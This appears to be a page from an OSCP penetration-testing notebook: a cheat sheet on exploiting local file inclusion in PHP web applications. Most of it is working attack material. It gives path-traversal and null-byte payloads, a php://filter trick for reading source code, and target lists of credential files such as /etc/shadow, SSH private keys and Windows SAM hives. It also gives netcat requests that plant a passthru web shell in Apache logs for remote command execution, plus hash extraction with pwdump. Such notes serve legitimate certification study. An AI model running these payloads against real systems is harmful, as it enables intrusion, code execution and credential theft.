OSCP
Search…
LFI
In this example the user could just enter this string and retrieve the /etc/passwd file.
1
http://example.com/page=../../../../../../etc/passwd
Copied!

Bypassing the added .php and other extra file-endings

It is common to add the file-extension through the php-code. Here is how this would look like:
1
$file = $_GET['page'];
2
require($file . ".php");
Copied!
The php is added to the filename, this will mean that we will not be able to find the files we are looking for. Since the file /etc/passwd.php does not exist. However, if we add the nullbyte to the end of our attack-string the .php will not be taken into account. So we add %00 to the end of our attack-string.
1
http://example.com/page=../../../../../../etc/passwd%00
Copied!

Bypassing php-execution

So if you have an LFI you can easily read .txt-files but not .php files. That is because they get executed by the webserver, since their file-ending says that it contains code. This can be bypassed by using a build-in php-filter.
1
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
Copied!

Linux

Tricks

Download config-files in a nice style-format
If you read files straight in the browser the styling can becomes unbearable. Really difficult to read. A way around it is to download the files from the terminal. But that won't work if there is a login that is blocking it. So this is a great workaround:
1
# First we save the cookie
2
curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
3
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile
Copied!

Sensitive file

This is the default layout of important apache files. https://wiki.apache.org/httpd/DistrosDefaultLayout
1
/etc/issue (A message or system identification to be printed before the login prompt.)
2
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
3
/etc/passwd
4
/etc/group
5
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
6
/etc/shadow
7
/home/[USERNAME]/.bash_history or .profile
8
~/.bash_history or .profile
9
$USER/.bash_history or .profile
10
/root/.bash_history or .profile
Copied!
1
/etc/mtab
2
/etc/inetd.conf
3
/var/log/dmessage
Copied!
Web server files
1
# Usually found in the root of the website
2
.htaccess
3
config.php
Copied!
SSH
1
authorized_keys
2
id_rsa
3
id_rsa.keystore
4
id_rsa.pub
5
known_hosts
Copied!
Logs
1
/etc/httpd/logs/acces_log
2
/etc/httpd/logs/error_log
3
/var/www/logs/access_log
4
/var/www/logs/access.log
5
/usr/local/apache/logs/access_ log
6
/usr/local/apache/logs/access. log
7
/var/log/apache/access_log
8
/var/log/apache2/access_log
9
/var/log/apache/access.log
10
/var/log/apache2/access.log
11
/var/log/access_log
Copied!
User specific files
Found in the home-directory
1
.bash_history
2
.mysql_history
3
.my.cnf
Copied!

LFI to shell

Under the right circumstances you might be able to get a shell from a LFI

Log poisoning

There are some requirements. We need to be able to read log files. In this example we are going to poison the apache log file. You can use either the success.log or the error.log
So once you have found a LFI vuln you have to inject php-code into the log file and then execute it.
Insert php-code into the log file
This can be done with nc or telnet.
1
nc ip 80
2
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
3
Host: ip
4
Connection: close
Copied!
You can also add it to the error-log by making a request to a page that doesn't exists
1
nc ip 80
2
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
3
Host: ip
4
Connection: close
Copied!
Or in the referer parameter.
1
GET / HTTP/1.1
2
Referer: <? passthru($_GET[cmd]) ?>
3
Host: ip
4
Connection: close
Copied!
Execute it in the browser
Now you can request the log-file through the LFI and see the php-code get executed.
1
http://ip/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
Copied!

Proc files

If you can read the proc-files on the system you might be able to poison them through the user-agent.
We can also inject code into /proc/self/environ through the user-agent

Windows

Fingerprinting
1
c:\WINDOWS\system32\eula.txt
2
c:\boot.ini
3
c:\WINDOWS\win.ini
4
c:\WINNT\win.ini
5
c:\WINDOWS\Repair\SAM
6
c:\WINDOWS\php.ini
7
c:\WINNT\php.ini
8
c:\Program Files\Apache Group\Apache\conf\httpd.conf
9
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
10
c:\Program Files\xampp\apache\conf\httpd.conf
11
c:\php\php.ini
12
c:\php5\php.ini
13
c:\php4\php.ini
14
c:\apache\php\php.ini
15
c:\xampp\apache\bin\php.ini
16
c:\home2\bin\stable\apache\php.ini
17
c:\home\bin\stable\apache\php.ini
Copied!
Logs
Common path for apache log files on windows:
1
c:\Program Files\Apache Group\Apache\logs\access.log
2
c:\Program Files\Apache Group\Apache\logs\error.log
Copied!
PHP Session Locations
1
c:\WINDOWS\TEMP\
2
c:\php\sessions\
3
c:\php5\sessions\
4
c:\php4\sessions\
Copied!
Retrieving password hashes
In order to retrieve the systems password hashed we need two files: system and SAM. Once you have those two files you can extract the hased using the kali tool pwdump, like this:
1
pwdump systemfile samfile
Copied!
The system and SAM files can be found in different locations, so try them all. From a webserver the path might be case-sensitive, even though it is windows. So consider that!
1
Systemroot is usually windows
2
windows\repair\SAM
3
%SYSTEMROOT%\repair\SAM
4
%SYSTEMROOT%\System32\config\RegBack\SAM
5
%SYSTEMROOT%\System32\config\SAM
6
7
8
%SYSTEMROOT%\repair\system
9
%SYSTEMROOT%\System32\config\SYSTEM
10
%SYSTEMROOT%\System32\config\RegBack\system
Copied!

References:

This is the definitive guide to Local File inclusion https://highon.coffee/blog/lfi-cheat-sheet/+
Last modified 1yr ago